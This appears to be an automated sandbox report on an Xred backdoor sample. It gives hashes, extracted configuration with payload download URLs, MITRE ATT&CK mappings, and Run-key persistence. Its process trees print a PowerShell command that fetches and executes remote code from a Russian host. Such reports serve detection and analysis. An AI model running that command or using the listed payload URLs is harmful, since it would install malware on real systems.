xred | fcdcfc1ece209d59bc60808ff0bf3000563819fed794a3f4b48cf2be7d90f62f

Analysis

max time kernel
141s
max time network
144s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
03/03/2025, 06:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fcdcfc1ece209d59bc60808ff0bf3000563819fed794a3f4b48cf2be7d90f62f.exe
Size

813KB
MD5

7c9085b809fce3957fb26416999ab7b7
SHA1

725b6af42ab7b2008b48f00e62bb68af2edc351f
SHA256

fcdcfc1ece209d59bc60808ff0bf3000563819fed794a3f4b48cf2be7d90f62f
SHA512

28c47f6659f35c17cfb3b93bba16a1121cf87c8b088c6dfc200fe112028222aa631ddcde16bb9e742a1e5b21e4bcd4c375b2d884ea1fe0ecbbffd565ec343be5
SSDEEP

12288:1MSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9VBR:1nsJ39LyjbJkQFMhmC+6GD9d

Score

10^/10

xred backdoor discovery persistence

Malware Config

Extracted

Family

xred

xred.mooo.com

Attributes

email
[email protected]
payload_url
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1

http://xred.site50.net/syn/SUpdate.ini

https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download

https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1

http://xred.site50.net/syn/Synaptics.rar

https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download

https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1

http://xred.site50.net/syn/SSLLibrary.dll

Signatures

Xred
Xred is backdoor written in Delphi.
backdoor xred
Xred family
xred

Executes dropped EXE 3 IoCs

pid	Process
2692	._cache_fcdcfc1ece209d59bc60808ff0bf3000563819fed794a3f4b48cf2be7d90f62f.exe
2856	Synaptics.exe
3044	._cache_Synaptics.exe

Loads dropped DLL 5 IoCs

pid	Process
2676	fcdcfc1ece209d59bc60808ff0bf3000563819fed794a3f4b48cf2be7d90f62f.exe
2676	fcdcfc1ece209d59bc60808ff0bf3000563819fed794a3f4b48cf2be7d90f62f.exe
2676	fcdcfc1ece209d59bc60808ff0bf3000563819fed794a3f4b48cf2be7d90f62f.exe
2856	Synaptics.exe
2856	Synaptics.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe"	fcdcfc1ece209d59bc60808ff0bf3000563819fed794a3f4b48cf2be7d90f62f.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fcdcfc1ece209d59bc60808ff0bf3000563819fed794a3f4b48cf2be7d90f62f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	._cache_fcdcfc1ece209d59bc60808ff0bf3000563819fed794a3f4b48cf2be7d90f62f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Synaptics.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	._cache_Synaptics.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1108	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1084	powershell.exe
824	powershell.exe
2208	powershell.exe
564	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1084	powershell.exe
Token: SeDebugPrivilege	824	powershell.exe
Token: SeDebugPrivilege	2208	powershell.exe
Token: SeDebugPrivilege	564	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1108	EXCEL.EXE

Suspicious use of WriteProcessMemory 36 IoCs

description	pid	Process	procid_target
PID 2676 wrote to memory of 2692	2676	fcdcfc1ece209d59bc60808ff0bf3000563819fed794a3f4b48cf2be7d90f62f.exe	30
PID 2676 wrote to memory of 2692	2676	fcdcfc1ece209d59bc60808ff0bf3000563819fed794a3f4b48cf2be7d90f62f.exe	30
PID 2676 wrote to memory of 2692	2676	fcdcfc1ece209d59bc60808ff0bf3000563819fed794a3f4b48cf2be7d90f62f.exe	30
PID 2676 wrote to memory of 2692	2676	fcdcfc1ece209d59bc60808ff0bf3000563819fed794a3f4b48cf2be7d90f62f.exe	30
PID 2676 wrote to memory of 2856	2676	fcdcfc1ece209d59bc60808ff0bf3000563819fed794a3f4b48cf2be7d90f62f.exe	32
PID 2676 wrote to memory of 2856	2676	fcdcfc1ece209d59bc60808ff0bf3000563819fed794a3f4b48cf2be7d90f62f.exe	32
PID 2676 wrote to memory of 2856	2676	fcdcfc1ece209d59bc60808ff0bf3000563819fed794a3f4b48cf2be7d90f62f.exe	32
PID 2676 wrote to memory of 2856	2676	fcdcfc1ece209d59bc60808ff0bf3000563819fed794a3f4b48cf2be7d90f62f.exe	32
PID 2692 wrote to memory of 2660	2692	._cache_fcdcfc1ece209d59bc60808ff0bf3000563819fed794a3f4b48cf2be7d90f62f.exe	33
PID 2692 wrote to memory of 2660	2692	._cache_fcdcfc1ece209d59bc60808ff0bf3000563819fed794a3f4b48cf2be7d90f62f.exe	33
PID 2692 wrote to memory of 2660	2692	._cache_fcdcfc1ece209d59bc60808ff0bf3000563819fed794a3f4b48cf2be7d90f62f.exe	33
PID 2692 wrote to memory of 2660	2692	._cache_fcdcfc1ece209d59bc60808ff0bf3000563819fed794a3f4b48cf2be7d90f62f.exe	33
PID 2856 wrote to memory of 3044	2856	Synaptics.exe	34
PID 2856 wrote to memory of 3044	2856	Synaptics.exe	34
PID 2856 wrote to memory of 3044	2856	Synaptics.exe	34
PID 2856 wrote to memory of 3044	2856	Synaptics.exe	34
PID 3044 wrote to memory of 912	3044	._cache_Synaptics.exe	37
PID 3044 wrote to memory of 912	3044	._cache_Synaptics.exe	37
PID 3044 wrote to memory of 912	3044	._cache_Synaptics.exe	37
PID 3044 wrote to memory of 912	3044	._cache_Synaptics.exe	37
PID 3044 wrote to memory of 1084	3044	._cache_Synaptics.exe	39
PID 3044 wrote to memory of 1084	3044	._cache_Synaptics.exe	39
PID 3044 wrote to memory of 1084	3044	._cache_Synaptics.exe	39
PID 3044 wrote to memory of 1084	3044	._cache_Synaptics.exe	39
PID 1084 wrote to memory of 824	1084	powershell.exe	41
PID 1084 wrote to memory of 824	1084	powershell.exe	41
PID 1084 wrote to memory of 824	1084	powershell.exe	41
PID 1084 wrote to memory of 824	1084	powershell.exe	41
PID 2692 wrote to memory of 2208	2692	._cache_fcdcfc1ece209d59bc60808ff0bf3000563819fed794a3f4b48cf2be7d90f62f.exe	43
PID 2692 wrote to memory of 2208	2692	._cache_fcdcfc1ece209d59bc60808ff0bf3000563819fed794a3f4b48cf2be7d90f62f.exe	43
PID 2692 wrote to memory of 2208	2692	._cache_fcdcfc1ece209d59bc60808ff0bf3000563819fed794a3f4b48cf2be7d90f62f.exe	43
PID 2692 wrote to memory of 2208	2692	._cache_fcdcfc1ece209d59bc60808ff0bf3000563819fed794a3f4b48cf2be7d90f62f.exe	43
PID 2208 wrote to memory of 564	2208	powershell.exe	45
PID 2208 wrote to memory of 564	2208	powershell.exe	45
PID 2208 wrote to memory of 564	2208	powershell.exe	45
PID 2208 wrote to memory of 564	2208	powershell.exe	45

C:\Users\Admin\AppData\Local\Temp\fcdcfc1ece209d59bc60808ff0bf3000563819fed794a3f4b48cf2be7d90f62f.exe
"C:\Users\Admin\AppData\Local\Temp\fcdcfc1ece209d59bc60808ff0bf3000563819fed794a3f4b48cf2be7d90f62f.exe"
1⤵
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2676
- C:\Users\Admin\AppData\Local\Temp\._cache_fcdcfc1ece209d59bc60808ff0bf3000563819fed794a3f4b48cf2be7d90f62f.exe
  "C:\Users\Admin\AppData\Local\Temp\._cache_fcdcfc1ece209d59bc60808ff0bf3000563819fed794a3f4b48cf2be7d90f62f.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2692
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c start "" "jdk/include/win32/bridge/Rar.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2660
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -c irm web4200.craft-host.ru/crack/youtube | iex
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2208
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c irm web4200.craft-host.ru/crack/youtube
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:564
- C:\ProgramData\Synaptics\Synaptics.exe
  "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2856
- - C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
    "C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3044
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c start "" "jdk/include/win32/bridge/Rar.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:912
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -c irm web4200.craft-host.ru/crack/youtube | iex
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1084
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c irm web4200.craft-host.ru/crack/youtube
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:824

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1108

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Synaptics\Synaptics.exe

Filesize
813KB

MD5
7c9085b809fce3957fb26416999ab7b7

SHA1
725b6af42ab7b2008b48f00e62bb68af2edc351f

SHA256
fcdcfc1ece209d59bc60808ff0bf3000563819fed794a3f4b48cf2be7d90f62f

SHA512
28c47f6659f35c17cfb3b93bba16a1121cf87c8b088c6dfc200fe112028222aa631ddcde16bb9e742a1e5b21e4bcd4c375b2d884ea1fe0ecbbffd565ec343be5

Download Submit
C:\Users\Admin\AppData\Local\Temp\._cache_fcdcfc1ece209d59bc60808ff0bf3000563819fed794a3f4b48cf2be7d90f62f.exe

Filesize
59KB

MD5
7a0d8f14a9fac1614bc2bf4c7776cd23

SHA1
ee0be2486c2eea9d01298fb579162e1abc02a705

SHA256
8477be4f4473d860f3e9bfdc5b1c7ffbcfe2bf4cb31b51b341c64b46624674bf

SHA512
6dd83f6874a5430417e3c09291d50a4f39abfb527de7fabc686c78e8dd2b281c329fe8afd546d2cd9f27c1fd2fc2f9724c3d96f2ede99bc5b0f056327be32067

Download Submit
C:\Users\Admin\AppData\Local\Temp\bl2af3dw.xlsm

Filesize
17KB

MD5
e566fc53051035e1e6fd0ed1823de0f9

SHA1
00bc96c48b98676ecd67e81a6f1d7754e4156044

SHA256
8e574b4ae6502230c0829e2319a6c146aebd51b7008bf5bbfb731424d7952c15

SHA512
a12f56ff30ea35381c2b8f8af2446cf1daa21ee872e98cad4b863db060acd4c33c5760918c277dadb7a490cb4ca2f925d59c70dc5171e16601a11bc4a6542b04

Download Submit
C:\Users\Admin\AppData\Local\Temp\bl2af3dw.xlsm

Filesize
25KB

MD5
fcfed3e96db3a745fcbc8c55e4d15818

SHA1
1996c2ef305626d9a7ee0b838d5181845c08a27b

SHA256
693da5da44ad0e872b05f86d04580c4fea956f1e216961f88cd7caacd8513f05

SHA512
5a0640540df13e2e5bbdad9a7bc08c67557c7175de872fda806427fbe76b3c9344e8480c57f9d75f60e32533d665508d1ec7f466c52c5185d5c3313c0e7cdf1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\bl2af3dw.xlsm

Filesize
30KB

MD5
69c836e32fe3c26675611858abaad2f0

SHA1
8549b0f22af3294115b99490d1c63495dddecf07

SHA256
64aa031052aca17ea2635d71273be1644d73a23d55b80861088f177d2f992f50

SHA512
0c143d4d52a9131e2b849799f44d09024fa58da288de6178556d016aebc64e443504e3d54815a8c11ed1ff2f42880908944f526e15316278f27db3645312cb27

Download Submit
C:\Users\Admin\AppData\Local\Temp\bl2af3dw.xlsm

Filesize
29KB

MD5
dc9e9f4c941ea23c10c16353f568faf7

SHA1
73aae862cd35ed7bc3493525475ae7a7279b42fd

SHA256
c2347a3a78e1cb196998d9443f2415f1e0e1c7d9001e6b002152055590182d6a

SHA512
db511090843f8949baeacdda2931da11a0db74bcd6863519b8a3c0641ac54fa09260feb1bb72710a149134ce72bd9f2f808494da8f60bf48a029798d0417a5d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\bl2af3dw.xlsm

Filesize
29KB

MD5
d2a1a7b30428c00d20ef0e7daadc2713

SHA1
59311405ace158d8f65b49cc650a4a9253054930

SHA256
1eb0dfddd0ebfd4ce8552bbe67235ba8a9e02e8fd2b267ea7a9595d66a57161c

SHA512
edc32f0d1d055ffe5ccf0751aa4fa5002ee1bfa7652832de3cb76b1d45ddf4c94375cc600e2d2cf1e09a5aa35374e00578ac88c068a4dac0708feba3c3ed2686

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
e03176e48a84d446d609a5d98894dc81

SHA1
150105e0a98cc1a34cf9e2d4f2d46179cd3bfe7a

SHA256
2c43d32944b58d079b94113e59efc5eecbf753aa00d0a7d5c6b801974b8de2c8

SHA512
6de5fc55caf39cbf7cee718bb59c0274f34d2f43d7436d96d344255cd347e927157abfb3ed30d2c428f97928494d3befafdaaa86669d817a8c01dd3a31411199

Download Submit
C:\Users\Admin\Desktop\~$SplitConfirm.xlsx

Filesize
165B

MD5
ff09371174f7c701e75f357a187c06e8

SHA1
57f9a638fd652922d7eb23236c80055a91724503

SHA256
e4ba04959837c27019a2349015543802439e152ddc4baf4e8c7b9d2b483362a8

SHA512
e4d01e5908e9f80b7732473ec6807bb7faa5425e3154d5642350f44d7220af3cffd277e0b67bcf03f1433ac26a26edb3ddd3707715b61d054b979fbb4b453882

Download Submit
memory/1108-63-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2676-25-0x0000000000400000-0x00000000004D1000-memory.dmp

Filesize
836KB

Download
memory/2676-0-0x0000000000220000-0x0000000000221000-memory.dmp

Filesize
4KB

Download
memory/2856-151-0x0000000000400000-0x00000000004D1000-memory.dmp

Filesize
836KB

Download
memory/2856-200-0x0000000000400000-0x00000000004D1000-memory.dmp

Filesize
836KB

Download